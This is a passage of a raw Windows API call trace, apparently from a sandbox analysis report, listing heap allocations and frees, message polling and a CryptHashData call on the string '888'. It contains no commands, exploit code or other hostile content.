HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0229.661] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0229.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0229.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0229.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0229.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0229.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0229.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0229.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0229.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0229.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0229.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0229.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0229.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0229.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0229.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0229.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0229.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0229.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55108 [0229.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0229.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0229.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0229.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0229.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0229.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0229.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0229.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0229.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0229.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0229.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0229.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0229.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0229.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0229.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0229.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0229.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0229.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0229.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0229.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0229.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0229.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0229.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0229.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0229.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0229.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0229.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0229.664] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0229.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0229.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0229.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0229.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0229.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0229.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0229.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0229.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0229.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0229.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0229.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0229.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0229.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0229.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0229.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0229.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0229.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55018 [0229.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0229.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0229.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0229.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0229.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0229.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0229.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0229.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0229.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0229.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0229.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0229.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0229.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0229.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0229.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0229.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0229.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0229.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0229.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0229.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0229.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0229.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0229.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0229.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0229.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0229.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0229.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0229.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0229.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0229.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0229.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0229.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0229.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0229.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55088 [0229.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0229.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0229.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0229.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0229.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55078, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0229.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0229.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0229.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0229.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0229.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0229.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55028 [0229.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0229.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0229.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0229.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0229.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0229.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0229.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0229.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0229.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0229.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0229.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0229.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.741] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0229.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0229.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0229.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0229.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0229.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0229.741] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0229.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0229.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0229.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0229.742] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0229.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0229.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0229.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0229.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0229.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0229.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0229.742] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0229.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0229.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e514f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0229.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0229.743] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0229.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0229.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0229.743] CryptHashData (hHash=0xa87610, pbData=0x2e55018, dwDataLen=0x3, dwFlags=0x1) returned 1 [0229.743] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.743] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0229.743] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.743] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0229.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0229.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0229.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51478 [0229.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0229.744] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0229.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0229.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0229.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0229.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0229.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0229.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0229.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0229.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0229.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0229.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0229.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0229.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0229.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0229.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0229.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0229.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0229.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0229.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0229.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0229.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0229.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0229.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0229.745] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0229.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0229.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0229.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513e8 [0229.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0229.745] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0229.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0229.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0229.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0229.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0229.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0229.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0229.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0229.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0229.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0229.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0229.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0229.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0229.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0229.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0229.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0229.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0229.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0229.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0229.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0229.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0229.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0229.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0229.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0229.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0229.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0229.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0229.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0229.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0229.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0229.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0229.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0229.747] RtlAllocateHeap (HeapHandle=0x970000, 